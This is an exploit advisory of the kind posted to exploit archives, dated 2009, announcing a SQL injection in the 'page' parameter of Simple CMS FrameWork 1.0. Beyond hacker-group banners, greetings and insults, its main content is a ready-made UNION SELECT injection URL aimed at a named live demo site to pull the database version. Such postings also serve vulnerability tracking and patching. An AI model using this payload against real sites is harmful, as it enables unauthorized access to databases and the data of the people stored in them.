[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Simple CMS FrameWork <= 1.0 (page) Remote SQL Injection Vuln
# Published : 2009-08-26
# Author : Red-D3v1L
# Previous Title : Moa Gallery <= 1.2.0 (p_filename) Remote File Disclosure Vulnerability
# Next Title : Discuz! Plugin Crazy Star <= 2.0 (fmid) SQL Injection Vulnerability


==============================================================================
  ##  Hackteach.OrG ##
             

/ ___   )(  __   )/ ___   )
/   )  || (  )  |/   )  |
    /   )| | /   |    /   )
   /   / | (/ /) |   /   / 
  /   /  |   / | |  /   /  
 /   (_/|  (__) | /   (_/
(_______/(_______)(_______/
       
==============================================================================
        [??] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [??]  Simple CMS FrameWork <== 1.0 Remote SQL Injection Vulnerability
==============================================================================
    [??] my home:             [ Hackteach.org ]
    [??] Script:              [ Simple CMS FrameWork ]
    [??] Language:            [ PHP ]
    [??] Home:                [ http://westlingit.com/cms.php ]
    [??] Founder:             [ Red-D3v1L < php-c0de@hotmail.com > SQL@Hotmail.eS < ]
    [??] Gr44tz to:           [ All member Hackteach.org/cc - Str0ke - sp3x ]
    [??] Fuck To :            [ Anti-trust << Big Big Big Lamer << ]
########################################################################

===[ Exploit SQL ]===  

 [??] [Path]/index.php?id=null&page=[SQL]

 [??] L1v3 d3m0 : 

http://dev.westlingit.com/simplecms/index.php?id=null&page=-0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19 


Author: Red-D3v1L <-

###########################################################################

# www.Syue.com [2009-08-26]